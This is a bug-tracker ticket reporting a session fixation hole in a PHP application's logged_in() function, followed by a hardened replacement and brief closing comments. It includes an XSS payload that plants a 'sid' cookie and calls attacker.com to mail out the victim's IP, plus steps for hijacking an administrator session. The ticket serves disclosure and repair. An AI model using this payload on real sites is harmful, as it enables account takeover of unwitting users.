#228 SESSION FIXATION

closed-out-of-date
nabber00
Security (24)
7
2010-08-15
2010-08-15
nabber00
No

In a session fixation attack, the attacker has to set
the victim's session id. In our case, once the attacker
fixes the user's session id, the victim, who is logged in,
will get logged out when the cookie is set; then, if the
victim tries to log in again, the attacker's session id
will be registered on the server. Let's see a part of the
logged_in() function:

function logged_in ( $redirect_to_login, $redirect_to_setup ) {

    // Turn off URL SIDs.
    ini_set('url_rewriter.tags','');
    ini_set('session.use_trans_sid', false);

    // Init the session.
    session_set_cookie_params(60*60*24*5);

    // Check if the user has a client-side cookie.
    // (This is the weak spot: whatever value the client sends in "sid"
    // is adopted as the session id, which is what lets an attacker fix it.)
    if ( isset( $_COOKIE[ 'sid' ] ) ) {
        session_id($_COOKIE[ 'sid' ]);
    }

    // Start the session.
    session_start ();

    // Check if user is logged in.
    if ( isset( $_SESSION[ 'logged_in' ] ) &&
         $_SESSION[ 'logged_in' ] == 'yes' ) {

        if ( $_SESSION[ 'site_path' ] ===
             dirname($_SERVER[ 'PHP_SELF' ]) ) {

            if ( $_SESSION[ 'ip' ] === getIP() ) {
                // User is logged in.
                return ( true );
            }
        }
    }

    // ... remainder of the function (redirect handling) not shown in the ticket.
}

Afterwards, the attacker, who knows the session id, just
has to use it to be logged in to the victim's account.
But in our case, he must also know the victim's IP.
I'll demonstrate how to get administrator rights even
if the victim has a protection against XSS (the NoScript
Firefox plugin, for example). First, the attacker will
fix the victim's session id by setting a cookie in the
victim's browser. Then he'll also force the victim's web
browser to establish a connection to a script that
will get the victim's IP. Take a look at this schema:

1. The attacker posts a comment using the XSS vulnerability.
   The code that will be executed in the victim's browser
   will set the "sid" cookie; it will also force the
   victim's web browser to send an HTTP request to a script
   that will mail the victim's IP to the attacker:

       <meta http-equiv=Set-Cookie content=sid=MD5HERE;>
       <img src=http://attacker.com/getip_and_mail.php>

2. The victim, who is logged in, has to view the comments
   page. After viewing it, the victim will be logged out.

3. The victim tries to log in. Now that she is logged in,
   the session id set by the attacker is registered on the
   server.

4. Now the attacker just has to send an HTTP request which
   contains the session id and a special header with the
   victim's IP. The attacker is logged in to the victim's
   account.

As you can see, even if the victim is protected against
XSS, it's still possible to get administrator rights with
this type of attack; we just use the "meta" and "img" tags.

Source: http://archive.cert.uni-stuttgart.de/bugtraq/2007/10/msg00314.html
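For comparison, here is a hardened variant of the logged_in() flow above. It is an added example, not the project's code: it drops the client-supplied session_id() call, enables PHP's strict session mode so a planted "sid" is discarded, regenerates the id at login, and binds the session to REMOTE_ADDR rather than to a header a naive getIP() might trust. It assumes PHP 7.3 or later (array form of session_set_cookie_params) and a hypothetical login handler that calls regenerate_login_session() after verifying credentials; the redirect parameters of the original function are omitted.

```php
<?php
// Hardened session start (added example; assumes PHP >= 7.3).
function start_session_safely(): void {
    // Reject any session id the server did not create: with strict mode an
    // attacker-planted "sid" cookie is ignored and a fresh id is issued, so a
    // fixated id is never the one that gets registered at login.
    ini_set('session.use_strict_mode', '1');
    ini_set('session.use_only_cookies', '1');   // no id in the URL
    ini_set('session.use_trans_sid', '0');
    session_name('sid');
    session_set_cookie_params([
        'lifetime' => 60 * 60 * 24 * 5,
        'httponly' => true,     // not readable from script
        'samesite' => 'Lax',
    ]);
    // Deliberately no session_id($_COOKIE['sid']): PHP reads the cookie itself.
    session_start();
}

// Called by the (hypothetical) login handler once credentials are verified.
function regenerate_login_session(string $user): void {
    // Changing the id on privilege change is the core fixation defence: even
    // if the browser arrived with a planted id, that id is not the one bound
    // to the authenticated session, and the old session data is destroyed.
    session_regenerate_id(true);
    $_SESSION['logged_in'] = 'yes';
    $_SESSION['user']      = $user;
    $_SESSION['site_path'] = dirname($_SERVER['PHP_SELF']);
    // Bind to the transport-level peer address, not to a client-supplied header.
    $_SESSION['ip']        = $_SERVER['REMOTE_ADDR'];
}

function logged_in(): bool {
    start_session_safely();
    if (!isset($_SESSION['logged_in']) || $_SESSION['logged_in'] !== 'yes') {
        return false;
    }
    if ($_SESSION['site_path'] !== dirname($_SERVER['PHP_SELF'])) {
        return false;
    }
    // REMOTE_ADDR cannot be changed by adding a request header, unlike
    // X-Forwarded-For style values that a trusting getIP() would accept.
    return $_SESSION['ip'] === $_SERVER['REMOTE_ADDR'];
}
```

If the site sits behind a reverse proxy, REMOTE_ADDR is the proxy's address; in that case trust a forwarded header only when it comes from that known proxy, never from arbitrary clients.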

Discussion

  • nabber00 - 2010-08-15

    Need to review how session management is handled here.

  • nabber00 - 2010-08-15

    When the getIP() function was fixed, this was also closed since the IP address is verified.

  • nabber00 - 2010-08-15
    • status: open --> closed-out-of-date
